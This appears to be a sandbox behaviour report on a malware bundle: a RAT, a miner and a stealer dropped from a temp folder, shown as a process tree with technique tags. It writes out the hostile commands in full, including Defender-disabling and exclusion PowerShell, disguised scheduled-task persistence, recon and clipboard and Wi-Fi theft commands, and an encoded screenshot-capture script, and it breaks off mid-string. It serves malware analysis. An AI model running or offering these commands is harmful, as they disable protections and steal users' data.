C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"4⤵
- Network Service Discovery
PID:4992 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5952
-
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵PID:1580
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername5⤵
- Collects information from the system
PID:5680
-
-
C:\Windows\system32\net.exenet user5⤵PID:5392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user6⤵PID:5360
-
-
-
C:\Windows\system32\query.exequery user5⤵PID:3488
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"6⤵PID:5132
-
-
-
C:\Windows\system32\net.exenet localgroup5⤵PID:5664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup6⤵PID:3200
-
-
-
C:\Windows\system32\net.exenet localgroup administrators5⤵PID:4736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators6⤵PID:5372
-
-
-
C:\Windows\system32\net.exenet user guest5⤵PID:3640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest6⤵PID:5828
-
-
-
C:\Windows\system32\net.exenet user administrator5⤵PID:4452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator6⤵PID:5260
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command5⤵PID:5296
-
-
C:\Windows\system32\tasklist.exetasklist /svc5⤵
- Enumerates processes with tasklist
PID:2896
-
-
C:\Windows\system32\ipconfig.exeipconfig /all5⤵
- Gathers network information
PID:5832
-
-
C:\Windows\system32\ROUTE.EXEroute print5⤵PID:3380
-
-
C:\Windows\system32\ARP.EXEarp -a5⤵
- Network Service Discovery
PID:5268
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano5⤵
- System Network Connections Discovery
- Gathers network information
PID:2252
-
-
C:\Windows\system32\sc.exesc query type= service state= all5⤵
- Launches sc.exe
PID:2156
-
-
C:\Windows\system32\netsh.exenetsh firewall show state5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6092
-
-
C:\Windows\system32\netsh.exenetsh firewall show config5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4392 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5584
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5304
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5616
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Essence Rat.exe"C:\Users\Admin\AppData\Local\Temp\Essence Rat.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5352
-
-
-
C:\Users\Admin\AppData\Local\Temp\remote.exe"C:\Users\Admin\AppData\Local\Temp\remote.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\remote.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'remote.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RegEdit.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegEdit.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RegEdit" /tr "C:\Users\Admin\AppData\Roaming\RegEdit.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5528
-
-
-
C:\Users\Admin\AppData\Local\Temp\miner.exe"C:\Users\Admin\AppData\Local\Temp\miner.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\Microsoft\svchost.exe"3⤵PID:5556
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr "C:\Users\Admin\Microsoft\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\svchost.exe"3⤵PID:4816
-
C:\Users\Admin\Microsoft\svchost.exeC:\Users\Admin\Microsoft\svchost.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit5⤵PID:4716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5144
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"5⤵
- Executes dropped EXE
PID:5952 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "bchbxplvojdk"6⤵PID:1580
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit7⤵PID:4784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"8⤵
- Suspicious behavior: EnumeratesProcesses
PID:5428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="8⤵PID:2384
-
-
-
C:\Users\Admin\Microsoft\svchost.exe"C:\Users\Admin\Microsoft\svchost.exe"7⤵
- Executes dropped EXE
PID:2160 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit8⤵PID:5136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"9⤵PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="9⤵PID:3432
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:224
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3008
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4368 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3924
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:3964
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:3988
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpA